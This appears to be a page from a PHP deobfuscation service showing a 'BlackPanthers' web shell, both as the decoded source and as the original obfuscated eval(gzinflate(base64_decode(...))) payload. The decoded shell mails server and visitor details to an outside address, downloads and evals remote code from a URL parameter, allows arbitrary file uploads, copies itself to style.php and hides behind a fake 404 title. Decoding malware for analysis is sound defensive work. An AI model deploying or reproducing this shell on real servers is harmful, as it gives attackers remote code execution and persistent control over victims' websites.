Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(base64_decode(str_rot13(strrev('=pt/fb7LyFihtJCY5vf3CFTryuPScgeiwdjW..
Decoded Output download
set_time_limit(0);
error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Setoran Shells
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF BlackPanthers";}
else {$security= "SAFE_MODE = ON Bad";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 1;
}else{
$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti = $_SERVER['DOCUMENT_ROOT'].'/'.'style.php';
rename($source, $desti);
}
$site = $_GET['url'];
$cek = file_get_contents("$site");
eval(gzinflate(base64_decode($cek)));
echo "<title>404 Not Found</title><br>";
if(isset($_GET['cek'])){
echo "Simple Injektor</br></br>";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF BlackPanthers";}
else {$security= "SAFE_MODE : ON Bad";}
echo "<font size=5 color=yellow>Powered by BlackPanthers<br>";
echo "<font size=3 color=white>Status : ready fresh tools SHELLS FTP CPANEL RDP MAILER<br><br>";
echo "<font size=2 color=red><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#64D300><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#64D300><b>Uname : ".php_uname()."</b><br>";
}
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
$files = @$_FILES["files"];
if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
}
}
if(isset($_GET['colek'])){
echo '<html><head><title>Upload files</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>';
}
?>
<html>
<head>
<title>BlackPanthers</title>
</head>
<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
<b><font color="#000080" size="2">#</font></b></td>
<td bgcolor="#000080"><font face="Verdana" size="2" color="#009900"><b>CGI-Telnet BlackPanthers Team Connected to the server</b></font></td>
</tr>
<tr>
<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
</font></td>
</tr>
</table>
<font color="#009900" size="3">
<body bgcolor=black>
<pre><font color="#ff0000"> _____ _____ _____ _____ _ _
/ __ \| __ \|_ _| |_ _| | | | |
| / \/| | \/ | | ______ | | ___ | | _ __ ___ | |_
| | | | __ | | |______| | | / _ \| || '_ \ / _ \| __|
| \__/\| |_\ \ _| |_ | | | __/| || | | || __/| |_
\____/ \____/ \___/ \_/ \___||_||_| |_| \___| \__| 2.0
</font><font color="#FF0000"> ______ </font><font color="#AE8300"> 2019, BLACK-P Team</font><font color="#FF0000">
.-" "-.
/ BlackP | |
|, .-. .-. ,|
| )(_o/ \o_)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \</font><font color="#009900">_______</font><font color="#FF0000">\</font><font color="#009900">__</font><font color="#FF0000">|*EVIL*|</font><font color="#009900">__</font><font color="#FF0000">/</font><font color="#009900">_______________________
</font><font color="#FF0000"> (_)</font><font color="#009900">@8@8</font><font color="#FF0000">{}</font><font color="#009900"><________</font><font color="#FF0000">|-\MASTER/-|</font><font color="#009900">________________________></font><font color="#FF0000">
)_/ \ /
(@ `--------`
</font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
<code>
<form name="f" method="POST" action="admin">
<input type="hidden" name="a" value="login">
login: admin<br>
password:<input type="password" name="p">
<input type="submit" value="Enter">
</form>
</code>
<script language="JavaScript">
var text ="<b>I'm<b> <i>just a creature who always wanted to learn, I'm not a </i><b>HACKER</b>.<i> I'm also not a destroyer !!! <br><b>I just wanted to show the ugliness of YOUR own system that you be not careless </b></i>..</br><b> I HOPE YOU GOT LOVE </b>:)";
var delay=50;
var currentChar=5;
var destination="[none]";
function type()
{
//if (document.all)
{
var dest=document.getElementById(destination);
if (dest)// && dest.innerHTML)
{
dest.innerHTML=text.substr(0, currentChar)+"<blink>_</blink>"; currentChar++;
if (currentChar>text.length)
{
currentChar=1;
setTimeout("type()", 5000);
}
else
{
setTimeout("type()", delay);
}
}
}
}
function startTyping(textParam, delayParam, destinationParam)
{
text=textParam;
delay=delayParam;
currentChar=5;
destination=destinationParam; type();
}
</script> <b>
<div 0px="" 12px="" arial="" color:="" ff0000="" font:="" id="textDestination" margin:="" style="background-color: none; color: #00ff00; text-align: center; font-family: arial; font-size: 30px"></div></b> <script language="JavaScript"> javascript:startTyping(text, 50, "textDestination"); </script>
</head>
</html>
Did this file decode correctly?
Original Code
<?php
eval(gzinflate(base64_decode(str_rot13(strrev('=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')))));
?>
Function Calls
strrev | 1 |
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 1 |
Stats
MD5 | a7163fd572ea73a85c26e30d2719244c |
Eval Count | 1 |
Decode Time | 96 ms |